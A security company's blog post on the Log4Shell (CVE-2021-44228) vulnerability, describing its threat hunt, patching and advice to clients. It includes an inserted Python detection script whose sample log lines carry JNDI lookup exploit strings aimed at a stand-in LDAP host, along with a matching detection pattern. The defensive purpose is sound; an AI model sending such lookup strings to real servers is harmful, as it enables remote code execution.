Tuesday, Dec 14, 2021
BY: Team Nuspire
A new zero-day vulnerability in Log4j, an open-source Java library that provides logging capabilities, was recently discovered. Called “CVE-2021-44228” or “Log4Shell,” the vulnerability could be used by bad actors to take control of Java-based web servers and launch attacks that could give them control of entire computer servers. Log4Shell has been graded a 10 of 10 (Critical) on the CVSSv3 severity scale, as it is remotely exploitable and requires little technical skill to execute.
What Nuspire Clients Need to Know
The Log4Shell attack prompted an emergency security update from the Apache Software Foundation. Nuspire published a threat brief with details covering this vulnerability, including an executive summary, recommendations and links to the patch.
Upon discovery of the exploit, Nuspire immediately launched an internal risk assessment combined with an inventory of our internal and third-party use of Log4j. Concurrently, we launched an internal threat hunt on Dec. 10 to search for known strings that indicate an exploitation attempt against the vulnerability. This threat hunt was updated on Dec. 14 to include a list of IP addresses known by our open- and closed-source threat intelligence to be scanning for vulnerable assets.
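The threat hunt described above combines two kinds of indicators: known request strings that signal a Log4Shell exploitation attempt, and a list of source IP addresses known to be scanning for vulnerable assets. The following is an added illustration of that kind of hunt, not Nuspire's own tooling or detection content. It runs over a handful of constructed web-server access-log lines, URL-decodes each line so encoded lookups are not missed, matches the JNDI lookup string case-insensitively, and cross-checks the source IP against a constructed watchlist. The IP addresses and log lines are made-up sample data from the documentation ranges, not real threat intelligence.

```python
import re
from urllib.parse import unquote

# Constructed watchlist of scanner IPs (documentation-range addresses, not real intel).
SCANNER_WATCHLIST = {"203.0.113.7", "198.51.100.22"}

# Constructed sample access-log lines (combined-log style: client IP, timestamp,
# request, status, bytes, referer, user-agent). None of these are real captures.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://example.invalid/a}"',
    '192.0.2.15 - - [10/Dec/2021:14:03:40 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0"',
    '198.51.100.22 - - [10/Dec/2021:14:05:02 +0000] "GET /robots.txt HTTP/1.1" 200 64 "-" '
    '"Mozilla/5.0"',
    '192.0.2.99 - - [10/Dec/2021:14:06:30 +0000] '
    '"GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

# The lookup prefix Log4j 2 evaluates; matched case-insensitively after decoding.
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)
# Client IP is the first field of the log line.
LEADING_IP = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s")


def normalize(line: str) -> str:
    """URL-decode the line so percent-encoded lookup strings are visible to the match."""
    return unquote(line)


def classify(line: str):
    """Return (source_ip, reasons) for one log line; reasons is empty for benign lines."""
    reasons = []
    match = LEADING_IP.match(line)
    source_ip = match.group(1) if match else None
    if source_ip in SCANNER_WATCHLIST:
        reasons.append("watchlist-ip")
    if JNDI_LOOKUP.search(normalize(line)):
        reasons.append("jndi-lookup-string")
    return source_ip, reasons


def hunt(lines):
    """Run the hunt over an iterable of log lines and return the hits as
    (1-based line number, source IP, reasons) tuples."""
    hits = []
    for number, line in enumerate(lines, start=1):
        source_ip, reasons = classify(line)
        if reasons:
            hits.append((number, source_ip, reasons))
    return hits


if __name__ == "__main__":
    for number, source_ip, reasons in hunt(SAMPLE_LOG):
        print(f"line {number}: {source_ip} -> {', '.join(reasons)}")
```

A hit on the lookup string alone is an exploitation attempt worth triaging regardless of the source, while a watchlist-only hit (line 3 above, a benign request from a known scanner) is lower priority but still useful for confirming that the scanner list is reaching your environment. In a real hunt the watchlist would be refreshed from threat-intelligence feeds as the Dec. 14 update describes, and the decode step should be applied to every field an attacker controls (headers, query strings, form bodies), since Log4j evaluates the lookup wherever the string ends up being logged.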
Additionally, we began an emergency patching cycle against our vulnerable assets, prioritized by risk. We identified 14 instances of Log4j in our environment. At this time, we have patched the vulnerable systems or mitigated the vulnerability with protections such as ensuring Java Security Manager is installed and blocking exploitation of the vulnerability.
Finally, we are taking steps to ensure our threat hunts are continuously updated as more information becomes available. We encourage all of our clients to follow Nuspire threat briefs and the guidance issued by the Cybersecurity & Infrastructure Security Agency (CISA) regarding the vulnerability.
Our recommendation to our clients is to immediately patch any vulnerable instances of Log4j, as this vulnerability is likely to be actively exploited.